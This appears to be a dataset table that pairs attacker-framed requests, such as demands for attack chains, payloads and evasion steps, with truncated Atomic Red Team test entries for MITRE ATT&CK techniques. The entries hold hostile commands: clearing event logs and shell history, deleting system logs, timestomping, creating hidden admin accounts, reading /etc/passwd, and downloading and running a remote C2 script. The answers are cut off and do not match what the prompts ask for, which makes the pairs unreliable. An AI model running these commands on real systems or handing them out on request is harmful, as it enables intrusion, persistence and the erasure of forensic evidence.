MITRE T1059.003: Command and Scripting Interpreter: Windows Command Shell exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1059.003: Command and Scripting Interpreter: Windows Command Shell
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Create and Execute Batch Script
**Executor**: powershell
**Command**:
```
Start-Process "#{script_path}"
```
**Cleanup**:
```
Remove-Item "#{script_pa... | ART | T1059.003 |
Red team: MITRE T1059.005: Command and Scripting Interpreter: Visual Basic. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1059.005: Command and Scripting Interpreter: Visual Basic
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Visual Basic script execution to gather local computer information
**Executor**: powershell
**Command**:
```
cscript "#{vbscript}" > $env:TEMP\T1059.005.out.tx... | ART | T1059.005 |
MITRE T1059.006: Command and Scripting Interpreter: Python: What are 4 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1059.006: Command and Scripting Interpreter: Python
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Execute shell script via python's command mode arguement
**Executor**: sh
**Command**:
```
which_python=$(which python || which python3 || which python3.9 || which p... | ART | T1059.006 |
MITRE T1059.007: Command and Scripting Interpreter: JavaScript — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1059.007: Command and Scripting Interpreter: JavaScript
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: JScript execution to gather local computer information via cscript
**Executor**: command_prompt
**Command**:
```
cscript "#{jscript}" > %tmp%\T1059.007.out.txt
`... | ART | T1059.007 |
MITRE T1059.010: Command and Scripting Interpreter: AutoHotKey & AutoIT exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1059.010: Command and Scripting Interpreter: AutoHotKey & AutoIT
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: AutoHotKey script execution
**Executor**: powershell
**Command**:
```
Start-Process -FilePath "#{autohotkey_path}" -ArgumentList "#{script_path}"
``` | ART | T1059.010 |
Red team: MITRE T1069.001: Permission Groups Discovery: Local Groups. List 7 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1069.001: Permission Groups Discovery: Local Groups
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Permission Groups Discovery (Local)
**Executor**: sh
**Command**:
```
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is mis... | ART | T1069.001 |
Attacker perspective on MITRE T1069.002: Permission Groups Discovery: Domain Groups: Give 15+ methods with step-by-step instructions and code samples. | # MITRE T1069.002: Permission Groups Discovery: Domain Groups
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Basic Permission Groups Discovery Windows (Domain)
**Executor**: command_prompt
**Command**:
```
net localgroup
net group /domain
net group "enterprise admins" /dom... | ART | T1069.002 |
Attacker perspective on MITRE T1070: Indicator Removal on Host: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1070: Indicator Removal on Host
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Indicator Removal using FSUtil
**Executor**: command_prompt
**Command**:
```
fsutil usn deletejournal /D C:
```
**Cleanup**:
```
fsutil usn createjournal m=1000 a=100 c:
```
### Test 2... | ART | T1070 |
Attacker perspective on MITRE T1070.001: Indicator Removal on Host: Clear Windows Event Logs: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1070.001: Indicator Removal on Host: Clear Windows Event Logs
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Clear Logs
**Executor**: command_prompt
**Command**:
```
wevtutil cl #{log_name}
```
### Test 2: Delete System Logs Using Clear-EventLog
**Executor**: pow... | ART | T1070.001 |
TARGET: MITRE T1070.002: Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs. Provide 20 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1070.002: Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: rm -rf
**Executor**: sh
**Command**:
```
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
```
##... | ART | T1070.002 |
TARGET: MITRE T1070.003: Indicator Removal on Host: Clear Command History. Provide 14 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1070.003: Indicator Removal on Host: Clear Command History
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Clear Bash history (rm)
**Executor**: sh
**Command**:
```
rm #{history_path}
```
### Test 2: Clear Bash history (echo)
**Executor**: sh
**Command**:
```
echo... | ART | T1070.003 |
Attacker perspective on MITRE T1070.004: Indicator Removal on Host: File Deletion: Give 11+ methods with step-by-step instructions and code samples. | # MITRE T1070.004: Indicator Removal on Host: File Deletion
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Delete a single file - FreeBSD/Linux/macOS
**Executor**: sh
**Command**:
```
rm -f #{file_to_delete}
```
**Cleanup**:
```
rm -rf #{parent_folder}
```
### Test 2: Del... | ART | T1070.004 |
Red team: MITRE T1070.005: Indicator Removal on Host: Network Share Connection Removal. List 5 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1070.005: Indicator Removal on Host: Network Share Connection Removal
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Add Network Share
**Executor**: command_prompt
**Command**:
```
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:N... | ART | T1070.005 |
MITRE T1070.006: Indicator Removal on Host: Timestomp exploitation: provide 10+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1070.006: Indicator Removal on Host: Timestomp
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Set a file's access timestamp
**Executor**: sh
**Command**:
```
touch -a -t 197001010000.00 #{target_filename}
```
**Cleanup**:
```
rm -f #{target_filename}
```
### Test... | ART | T1070.006 |
Red team: MITRE T1070.008: Email Collection: Mailbox Manipulation. List 6 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1070.008: Email Collection: Mailbox Manipulation
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Copy and Delete Mailbox Data on Windows
**Executor**: powershell
**Command**:
```
New-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy" -ItemTy... | ART | T1070.008 |
Red team: MITRE T1071: Application Layer Protocol. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1071: Application Layer Protocol
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Telnet C2
**Executor**: powershell
**Command**:
```
#{client_path} #{server_ip} --port #{server_port}
``` | ART | T1071 |
Attacker perspective on MITRE T1071.001: Application Layer Protocol: Web Protocols: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1071.001: Application Layer Protocol: Web Protocols
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Malicious User Agents - Powershell
**Executor**: powershell
**Command**:
```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{... | ART | T1071.001 |
MITRE T1071.004: Application Layer Protocol: DNS exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1071.004: Application Layer Protocol: DNS
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: DNS Large Query Volume
**Executor**: powershell
**Command**:
```
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}-$(Get-Random -Mi... | ART | T1071.004 |
Attacker perspective on MITRE T1072: Software Deployment Tools: Give 3+ methods with step-by-step instructions and code samples. | # MITRE T1072: Software Deployment Tools
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Radmin Viewer Utility
**Executor**: command_prompt
**Command**:
```
"%PROGRAMFILES(x86)%/#{radmin_exe}"
```
### Test 2: PDQ Deploy RAT
**Executor**: command_prompt
**Command**:
```
"%P... | ART | T1072 |
MITRE T1074.001: Data Staged: Local Data Staging — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1074.001: Data Staged: Local Data Staging
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Stage data from Discovery.bat
**Executor**: powershell
**Command**:
```
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.0... | ART | T1074.001 |
Red team: MITRE T1078.001: Valid Accounts: Default Accounts. List 3 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1078.001: Valid Accounts: Default Accounts
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Enable Guest account with RDP capability and admin privileges
**Executor**: command_prompt
**Command**:
```
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_... | ART | T1078.001 |
MITRE T1078.003: Valid Accounts: Local Accounts — Give 13 different attacker methodologies. For each: exact commands, payloads, and evasion. | # MITRE T1078.003: Valid Accounts: Local Accounts
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Create local account with admin privileges
**Executor**: command_prompt
**Command**:
```
net user art-test /add
net user art-test #{password}
net localgroup administrators art-... | ART | T1078.003 |
MITRE T1078.004: Valid Accounts: Cloud Accounts: What are 3 proven attack paths? Detail each with tools, commands, payloads. | # MITRE T1078.004: Valid Accounts: Cloud Accounts
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Creating GCP Service Account and Service Account Key
**Executor**: sh
**Command**:
```
gcloud config set project #{project-id}
gcloud iam service-accounts create #{service-acco... | ART | T1078.004 |
MITRE T1082: System Information Discovery exploitation: provide 40+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1082: System Information Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: System Information Discovery
**Executor**: command_prompt
**Command**:
```
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
### Test 2: System Information D... | ART | T1082 |
MITRE T1083: File and Directory Discovery exploitation: provide 9+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1083: File and Directory Discovery
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: File and Directory Discovery (cmd.exe)
**Executor**: command_prompt
**Command**:
```
dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Prog... | ART | T1083 |
MITRE T1087.001: Account Discovery: Local Account exploitation: provide 11+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1087.001: Account Discovery: Local Account
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Enumerate all accounts (Local)
**Executor**: sh
**Command**:
```
cat /etc/passwd > #{output_file}
cat #{output_file}
```
**Cleanup**:
```
rm -f #{output_file}
```
### Test 2... | ART | T1087.001 |
MITRE T1090.001: Proxy: Internal Proxy exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1090.001: Proxy: Internal Proxy
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Connection Proxy
**Executor**: sh
**Command**:
```
export #{proxy_scheme}_proxy=#{proxy_server}:#{proxy_port}
curl #{test_url}
```
**Cleanup**:
```
unset #{proxy_scheme}_proxy
[ "#{run_... | ART | T1090.001 |
Red team: MITRE T1090.003: Proxy: Multi-hop Proxy. List 4 exploitation approaches with: reconnaissance, technique, PoC code. | # MITRE T1090.003: Proxy: Multi-hop Proxy
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Psiphon
**Executor**: powershell
**Command**:
```
& "PathToAtomicsFolder\T1090.003\src\Psiphon.bat"
```
**Cleanup**:
```
$Proxy = Get-Content $env:Temp\proxy-backup.txt -ErrorAction Ig... | ART | T1090.003 |
MITRE T1091: Replication Through Removable Media exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1091: Replication Through Removable Media
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: USB Malware Spread Simulation
**Executor**: powershell
**Command**:
```
$RemovableDrives=@()
$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | ... | ART | T1091 |
MITRE T1095: Non-Application Layer Protocol exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit. | # MITRE T1095: Non-Application Layer Protocol
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: ICMP C2
**Executor**: powershell
**Command**:
```
IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09... | ART | T1095 |
Attacker perspective on MITRE T1098: Account Manipulation: Give 17+ methods with step-by-step instructions and code samples. | # MITRE T1098: Account Manipulation
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Admin Account Manipulate
**Executor**: powershell
**Command**:
```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
... | ART | T1098 |
TARGET: MITRE T1098.001: Account Manipulation: Additional Cloud Credentials. Provide 3 distinct attack approaches:
1. Initial vector
2. Exploitation method
3. Payload/PoC
4. Evasion technique | # MITRE T1098.001: Account Manipulation: Additional Cloud Credentials
## Description
Security technique from MITRE ATT&CK framework.
## Atomic Tests
### Test 1: Azure AD Application Hijacking - Service Principal
**Executor**: powershell
**Command**:
```
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -St... | ART | T1098.001 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.